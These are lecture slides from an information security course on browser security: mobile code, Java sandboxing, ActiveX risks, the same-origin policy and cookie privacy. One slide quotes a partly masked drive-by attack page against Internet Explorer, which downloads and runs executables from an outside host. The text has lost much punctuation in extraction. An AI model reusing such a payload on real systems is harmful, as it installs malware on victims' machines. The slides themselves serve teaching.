Title: Information Security CS 526 Lecture 31
1Information Security CS 526Lecture 31
- Web Browser Security Issues
2Overview of Browser Security Issues
- Browsers communicate with the network and are
complicated (i.e., buggy) software - Browsers are ubiquitous
- Browsers do not subject to perimeter protection
- Browsers have many, many extensions
- Browsers run mobile code
- to support active contents
- Users use browsers to conduct critical
transactions - browsers interact users users trust browsers
- Browsers maintain a lot of sensitive data
3Browser and Network
Network
request
Browser
Web site
reply
OS
Hardware
- Browser sends requests
- May reveal private information (in forms,
cookies) - Browser receives information, code
- May corrupt state by running unsafe code
- Interaction susceptible to network attacks
- Use HTTPS, which uses SSL/TLS
4An Attack Incident Against IE Browser
- One Click on a malicious URL
- http//xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
- Result
lthtmlgtltheadgtlttitlegtlt/titlegtlt/headgtltbodygt ltstylegt
CURSOR url("http//vxxxxxxe.biz/adverts/033/sp
loit.anr") lt/stylegt ltAPPLET ARCHIVE'count.jar'
CODE'BlackBox.class' WIDTH1 HEIGHT1gt ltPARAM
NAME'url' VALUE'http//vxxxxxxe.biz/adverts/033/
win32.exe'gtlt/APPLETgt ltscriptgt try document.writ
e('ltobject data10911545105116115
58 109104116109108581021051081
0158 //C\fo''o.mht!''http//vxxxx''xxe.biz/
/adv''erts//033//targ.ch' 'm/targ''et.htm
typetext/x-scriptletgtlt/ob''jectgt') catch(e)
lt/scriptgt lt/bodygtlt/htmlgt
MS05-002
MS03-011
MS04-013
5An Attack Incident Against IE Browser
22 unwanted programs are installed without the
users consent
6Vulnerabilities in Browsers (According to
Symantec Data)
7Browser Are Extensible
- Browser Plugins
- e.g., Acrobat, Adobe Flash, Applu QuickTime, MS
Windows Media Player, Mozilla browser extensions,
Opera Widgets, Sun Java - Active X
- allows applications or parts of applications to
be utilized by the web browser - applications have full access to operating
systems - web pages can use/download active X components
8Browser Plugin Vulnerabilities
9Browsers Support Active Contents
- Javascript
- embedded in web pages and executed inside browser
- VBScript
- similar to Javascript, only for Windows
- Java applets
- small pieces of Java bytecodes that execute in
browsers
10Java Applet
- Local window
- Download
- Seat map
- Airline data
- Local data
- User profile
- Credit card
- Transmission
- Select seat
- Encrypted msg
11HTML and Scripting
- lthtmlgt
-
- ltPgt
- ltscriptgt
- var num1, num2, sum
- num1 prompt("Enter first number")
- num2 prompt("Enter second number")
- sum parseInt(num1) parseInt(num2)
- alert("Sum " sum)
- lt/scriptgt
-
- lt/htmlgt
Browser receives content, displays HTML and
executes scripts
12Document object model (DOM)
- Object-oriented interface used to read and write
web page documents - Examples
- Properties document.alinkColor, document.URL,
document.forms , document.links ,
document.anchors - Methods document.write(document.referrer)
13Security risks posted by mobile code
- Compromise host
- Write to file system
- Interfere with other processes in browser
environment - Steal information
- Read file system
- Read information associated with other browser
processes (e.g., other windows) - Fool the user
14Need for session state in Browsers
www.e_buy.com
www.e_buy.com/ shopping.cfm? pID269 item1102030
405
View Catalog
Check out
Select Item
www.e_buy.com/ shopping.cfm? pID269
www.e_buy.com/ checkout.cfm? pID269 item1102030
405
Store session information in URL Easily read on
network
15Store info across sessions?
- Cookies
- A cookie is a file created by an Internet site to
store information on your computer
Enters form data
Server
Browser
Stores cookie
Requests cookie
Server
Browser
Returns data
Http is stateless protocol cookies add state
16Cookie
- A named text string stored by the browser
- Accessible as property of the Document object
- Can be read and written entirely on client side
using Javascript - used for authenticating, tracking, and
maintaining specific information about users - e.g., site preferences, contents of shopping
carts - data may be sensitive
- may be used to gather information about specific
users
17Security/Privacy Issues in Web Browsers
- How to securely run mobile code?
- How to provide access control to cookies and DOM
objects? - How to deal with privacy risks?
18Approaches to run Mobile Code
- Sandboxing
- Code executed in browser has only restricted
access to OS, network - Isolation the same-origin principle
- Only the site that stores some information in the
browser may later read or modify that information
(or depend on it in any way). - Establish trust in the code
- code digitally signed
19Security Mechanisms for Effective Sandboxing
- Examine code before executing
- Java bytecode verifier performs critical tests
- Interpret code and trap risky operations
- Java bytecode interpreter does run-time tests
- Security manager applies local access policy
- Security manager policy based on
- Site that suppplied the code
- Code signing who signed it?
20Java Virtual Machine Architecture
A.class
A.java
Java Compiler
Compile source code
Java Virtual Machine
Loader
Network
B.class
Verifier
Linker
Bytecode Interpreter
21ActiveX
- ActiveX controls reside on client's machine,
activated by HTML object tag on the page - ActiveX controls are not interpreted by browser
- Compiled binaries executed by client OS
- Controls can be downloaded and installed
- Security model relies on three components
- Digital signatures to verify source of binary
- AuthentiCode
- IE policy can reject controls from network zones
- Controls marked by author as safe for
initialization, safe for scripting which affects
the way control used - Once accepted, installed and started, no control
over execution
22Installing Controls
If you install and run, no further control over
the code.
In principle, browser/OS could apply sandboxing,
other techniques for containing risks in native
code. But dont count on it.
23Risks associated with controls
- MSDN Warning
- An ActiveX control can be an extremely insecure
way to provide a feature - Many have suggested disabling ActiveX
- Why?
- It can do any user action
- read and write Windows registry
- access the local file system
- Other web pages can attack a control
- Once installed, control can be accessed by any
page - Page only needs to know class identifier (CLSID)
- Recommendation use other means if possible
http//msdn.microsoft.com/library/default.asp?url
/code/list/ie.asp
24IE Browser Helper Objects (Extensions)
- COM components loaded when IE starts up
- Run in same memory context as the browser
- Perform any action on IE windows and modules
- Detect browser events
- GoBack, GoForward, and DocumentComplete
- Access browser menu, toolbar and make changes
- Create windows to display additional information
- Install hooks to monitor messages and actions
- Summary No protection from extensions
http//msdn.microsoft.com/library/default.asp?url
/library/en-us/dnwebgen/html/bho.asp
25Javascript Security Model
- Sandbox design (at least conceptually)
- No direct file access or network access
- Same-origin policy
- Can only read properties of documents and windows
from same place server, protocol, port - Access control with signed scripts
- User can grant privileges to signed scripts
- UniversalBrowserRead/Write
- UniversalFileread,
- UniversalSendMail
Reference http//www.devarticles.com/c/a/JavaScri
pt/JavaScript-Security/
26Same Original Policy
- Applies to scripts that run in browsers
- Origin domain name protocol port
- all three must be equal for origin to be
considered the same - however, some access allowed for pages from same
domain, but not same host
27Examples, assuming www.example.com
Same-origin check applies to access to window
object of other frames, etc.
28Same Original Policy Accesses it Controls
- Same-origin policy applies to the following
accesses - manipulating browser windows
- URLs requested via the XmlHttpRequest
- XmlHttpRequest is an API that can be used by web
browser scripting languages to transfer XML and
other text data to and from a web server using
HTTP, by establishing an independent and
asynchronous communication channel. - used by AJAX
- manipulating frames (including inline frames)
- manipulating documents (included using the object
tag) - manipulating cookies
29Threats Same-Origin Policy Intends to Deal with
- Impersonation of a Legitimate User (Session
Hijacking) - violating the trust a website places in a remote
user, allowing the attacker to initiate HTTP
requests in the context of the remote user or
impersonate the remote user entirely. - Impersonation of a Legitimate Website (Phishing)
- violating the trust a user places in a remote
site by impersonating the site in whole or in
part.
30Same Original Policy Exceptions, Issues, and
Workarounds
- Parent Domain Traversal
- x.y.com can set its domain to y.com
- becomes problematic with international domains
- consider co.uk
- Use Flash browser plugins
- allow cross-domain requests if allowed by a rule
in crossdomain.xml - Many vulnerabilities
31Problems with S-O Principle
- Poorly enforced on some browsers
- Particularly older browsers
- Limitations if site hosts unrelated pages
- Example Web server often hosts sites for
unrelated parties - http//www.example.com/account/
- http//www.example.com/otheraccount/
- Same-origin policy, allows script on one page to
access properties of document from another - Can be bypassed in Cross-Site-Scripting attacks
32Browser Cookie Management
- Cookie Same-origin ownership
- Once a cookie is saved on your computer, only the
Web site that created the cookie can read it. - Variations
- Temporary cookies
- Stored until you quit your browser
- Persistent cookies
- Remain until deleted or expire
- Third-party cookies
- Originates on or sent to a web site other than
the one that provided the current page
33Third-party cookies
- Get a page from merchant.com
- Contains ltimg srchttp//doubleclick.com/advt.gifgt
- Image fetched from DoubleClick.com
- DoubleClick knows IP address and page you were
looking at - DoubleClick sends back a suitable advertisement
- Stores a cookie that identifies "you" at
DoubleClick - Next time you get page with a doubleclick.com
image - Your DoubleClick cookie is sent back to
DoubleClick - DoubleClick could maintain the set of sites you
viewed - Send back targeted advertising (and a new cookie)
- Cooperating sites
- Can pass information to DoubleClick in URL,
34Cookie privacy issues
- Cookies maintain record of your browsing habits
- Cookie stores information as set of name/value
pairs - May include any information a web site knows
about you - Sites track your activity from multiple visits to
site - Sites can share this information (e.g.,
DoubleClick) - Browser attacks could invade your privacy
35Coming Attractions